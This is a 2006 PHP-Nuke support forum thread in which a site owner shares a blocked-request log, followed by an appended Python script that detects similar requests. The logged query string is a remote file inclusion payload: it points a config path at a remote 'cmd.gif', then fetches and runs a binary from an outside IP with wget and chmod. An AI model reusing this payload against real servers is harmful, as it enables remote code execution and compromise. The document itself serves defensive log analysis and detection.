Ravens PHP Scripts: Forums
 

 

Dauthus (Worker)
Joined: Oct 07, 2003
Posts: 211
Posted: Tue Jun 20, 2006 6:33 pm

Date & Time: 2006-06-20 14:58:35 EDT GMT -0400
Blocked IP: 216.235.153.4
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Query String: XXX.XXX.XXX.XX/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd /tmp;wget 72.18.195.161/lnikon;chmod 744 lnikon;./lnikon;echo YYY;echo|
Get String: XX.XXX.XXX.XX/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd /tmp;wget 72.18.195.161/lnikon;chmod 744 lnikon;./lnikon;echo YYY;echo|
Post String: 207.234.134.66/index.php
Forwarded For: none
Client IP: none
Remote Address: 216.235.153.4
Remote Port: 41763
Request Method: GET

This is the first time I have actually seen this one. I have XXX out the IP of my domain, but everything else has been left as is.

I just checked my email and this same attack went on every Nuke site I have running on the server. This dude has been busy!

_________________
Vivere disce, cogita mori

Last edited by Dauthus on Tue Jun 20, 2006 6:45 pm; edited 1 time in total 
gregexp (The Mouse Is Extension Of Arm)
Joined: Feb 21, 2006
Posts: 1497
Location: In front of a screen....HELP! lol
Posted: Tue Jun 20, 2006 6:42 pm

It's been listed before.

_________________
For those who stand shall NEVER fall and those who fall shall RISE once more!! 
Dauthus
Posted: Tue Jun 20, 2006 6:46 pm

Can you give me a link to what it does? Curiosity is getting the best of me.
 
gregexp
Posted: Tue Jun 20, 2006 8:43 pm

I wish I knew what it does exactly... seems hitwalker has a better knowledge of this than I.
 
Guardian2003 (Site Admin)
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
Posted: Wed Jun 21, 2006 3:31 am

This attack is not for any nuke file I am aware of. I know of no known modules etc. that use the function 'com_content'.
The actual file they are using to attempt an XSS attack is 'cmd.gif' and despite it having a gif extension, it isn't an image file ;)
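
Added example, not part of the original thread and not the blocking filter's own code: a small Python check over a logged query string like the one in the first post. It flags parameter names that address PHP superglobals, parameter values that are absolute URLs, and values containing shell command separators. The rule names and sample strings are constructed for illustration, and the host is a documentation address.

```python
import re
from urllib.parse import unquote

# PHP superglobals that a request parameter name must never address.
SUPERGLOBALS = {"GLOBALS", "_REQUEST", "_GET", "_POST", "_COOKIE",
                "_SERVER", "_FILES", "_ENV", "_SESSION"}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
SHELL_CHAINING = re.compile(r"[;|`]|\$\(")


def inspect_query(raw_query):
    """Return a sorted list of (rule, parameter_name) findings for one request."""
    findings = set()
    # Decode once, then split on both '?' and '&': the logged request repeats
    # '?' to append a second parameter list behind the first one.
    for token in re.split(r"[?&]", unquote(raw_query)):
        name, sep, value = token.partition("=")
        if not sep:
            continue  # script name or empty fragment, not a parameter
        base = name.split("[", 1)[0]  # "_REQUEST[option]" -> "_REQUEST"
        if base in SUPERGLOBALS:
            findings.add(("superglobal-overwrite", name))
        if REMOTE_URL.match(value):
            findings.add(("remote-url-value", name))
        if SHELL_CHAINING.search(value):
            findings.add(("shell-chaining", name))
    return sorted(findings)


# Constructed samples. The first follows the shape of the blocked request in
# the thread, with the host replaced by a documentation address (192.0.2.10).
BLOCKED = ("index.php?option=com_content&do_pdf=1&id=1index2.php"
           "?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS="
           "&mosConfig_absolute_path=http://192.0.2.10/cmd.gif?"
           "&cmd=cd /tmp;echo YYY;echo|")
BENIGN = "modules.php?name=News&file=article&sid=12"

if __name__ == "__main__":
    for rule, name in inspect_query(BLOCKED):
        print(f"{rule:22} {name}")
    print("benign findings:", inspect_query(BENIGN))
```

The remote-url-value rule will also match legitimate parameters that carry a URL (a redirect target, for instance), so findings are best reviewed per parameter name rather than blocked blindly.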
 